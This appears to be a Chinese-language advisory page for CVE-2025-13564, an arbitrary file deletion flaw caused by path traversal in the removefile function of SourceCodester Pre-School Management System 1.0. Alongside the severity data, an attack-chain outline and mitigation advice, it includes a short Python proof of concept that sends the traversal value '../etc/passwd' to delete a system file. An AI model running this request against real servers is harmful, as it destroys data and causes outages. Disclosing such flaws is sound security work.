CVE-2025-13564 CVSS 5.4 中危

CVE-2025-13564 SourceCodester Pre-School Management System 任意文件删除漏洞

披露日期: 2025-11-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13564

漏洞类型

任意文件删除

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pre-School Management System 1.0

漏洞概述

CVE-2025-13564是SourceCodester Pre-School Management System 1.0中的一个安全漏洞。该漏洞位于FilehelperController.php的removefile函数中，允许攻击者通过操纵filepath参数执行任意文件删除操作。成功利用此漏洞可能导致系统拒绝服务，删除关键配置文件或用户数据，甚至可能进一步导致远程代码执行。由于攻击可远程执行且仅需低权限认证，对系统安全构成中等威胁。

技术细节

漏洞根源在于FilehelperController.php的removefile函数未对用户提交的filepath参数进行充分验证。攻击者可构造恶意路径字符串，利用路径遍历技术（如../）访问系统任意目录并删除文件。removefile函数直接使用传入的filepath参数调用文件删除操作，缺少权限检查和路径规范化处理。攻击者通过HTTP请求发送精心设计的filepath值，即可触发任意文件删除。

攻击链分析

STEP 1

侦察

识别目标系统版本和FilehelperController端点

STEP 2

构造

构建包含路径遍历的恶意filepath参数

STEP 3

利用

发送HTTP POST请求触发任意文件删除

STEP 4

影响

导致服务中断或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target.com'
# 构造恶意filepath参数删除系统文件
payload = '../etc/passwd'
data = {'filepath': payload}
response = requests.post(f'{target}/filehelper/removefile', data=data)
print(response.text)

影响范围

SourceCodester Pre-School Management System 1.0

防御指南

临时缓解措施

立即升级到最新版本或应用官方安全补丁，同时限制文件操作接口的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13564
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13564
3 Details https://www.cvedetails.com/cve/CVE-2025-13564/
4 VulDB https://vuldb.com/cve/CVE-2025-13564
5 Link https://github.com/0xffaaa/cve/blob/main/Pre_School_Management_System_Arbitrary_File_Deletion_Vulnerabilit.md
6 Link https://vuldb.com/?ctiid.333328
7 Link https://vuldb.com/?id.333328
8 Link https://vuldb.com/?submit.697083
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表